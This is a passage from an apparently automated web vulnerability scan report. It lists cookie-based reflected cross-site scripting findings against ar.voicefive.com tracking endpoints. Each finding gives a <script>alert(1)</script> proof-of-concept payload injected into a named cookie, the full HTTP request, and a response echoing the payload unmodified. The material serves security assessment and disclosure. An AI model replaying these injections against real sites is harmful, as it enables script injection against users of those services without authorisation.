Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&d8220<script>alert(1)</script>fb58a5e89b5; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:56 2011&recExp=Sun Feb 13 14:17:56 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
xp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&d8220<script>alert(1)</script>fb58a5e89b5', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

2.106. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 8ad6e<script>alert(1)</script>90d1b27338 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&8ad6e<script>alert(1)</script>90d1b27338; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:55 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:55 2011&recExp=Sun Feb 13 14:17:55 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606675; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27400

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&8ad6e<script>alert(1)</script>90d1b27338', "BMX_BR": 'pid=p84532700&prad=47146&arc=34917&exp=1297559105', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p84532700"
...[SNIP]...

2.107. http://ar.voicefive.com/bmx3/broker.pli [ar_p86183782 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p86183782 cookie is copied into the HTML document as plain text between tags. The payload 852da<script>alert(1)</script>32d8fc7ba09 was submitted in the ar_p86183782 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&852da<script>alert(1)</script>32d8fc7ba09; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:56 2011&recExp=Sun Feb 13 14:17:56 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
7509&arc=40400793&', "BMX_BR": 'pid=p84532700&prad=47146&arc=34917&exp=1297559105', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&852da<script>alert(1)</script>32d8fc7ba09', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02
...[SNIP]...

2.108. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p84053757 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p84053757 cookie is copied into the HTML document as plain text between tags. The payload 35daa<script>alert(1)</script>a261e708ef6 was submitted in the ar_s_p84053757 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1420280 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&; BMX_G=method->-1,ts->1297606673; BMX_3PC=1; ar_s_p84053757=1->129760667535daa<script>alert(1)</script>a261e708ef6; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:24:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=2&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:24:40 2011&prad=1160022&arc=1420280&; expires=Sat 14-May-2011 14:24:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1420280",Location:COMS
...[SNIP]...
p=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p84053757": 'exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&', "ar_s_p84053757": '1->129760667535daa<script>alert(1)</script>a261e708ef6', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "BMX_3PC": '1', "BMX_BR": 'pid=p
...[SNIP]...

2.109. http://ar.voicefive.com/bmx3/node_hulu.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload f15f0<script>alert(1)</script>04bbaea526f was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810f15f0<script>alert(1)</script>04bbaea526f

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
e);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "UID": '1d29d89e-72.246.30.75-1294456810f15f0<script>alert(1)</script>04bbaea526f', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb
...[SNIP]...

2.110. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the ar_da39f516a098b3de) ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload 283c1<script>alert(1)</script>01785e5a65 was submitted in the ar_da39f516a098b3de) ar_p68511049 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&283c1<script>alert(1)</script>01785e5a65; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19860

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&283c1<script>alert(1)</script>01785e5a65' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1297448662";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p75771577",RecruitFrequency:0,Inv:"inv_hulu",Version:3},{Pid:"p72205782",RecruitFrequency
...[SNIP]...

2.111. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p45555483 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 8d44c<script>alert(1)</script>06dfc11ec34 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&8d44c<script>alert(1)</script>06dfc11ec34; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
d Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&8d44c<script>alert(1)</script>06dfc11ec34', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:0
...[SNIP]...

2.112. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p67161473 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 35e21<script>alert(1)</script>82f3b1aaf6d was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&35e21<script>alert(1)</script>82f3b1aaf6d; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
)();}COMSCORE.BMX.Buddy.cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&35e21<script>alert(1)</script>82f3b1aaf6d', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:
...[SNIP]...

2.113. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p83612734 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 60c44<script>alert(1)</script>36b26e72378 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

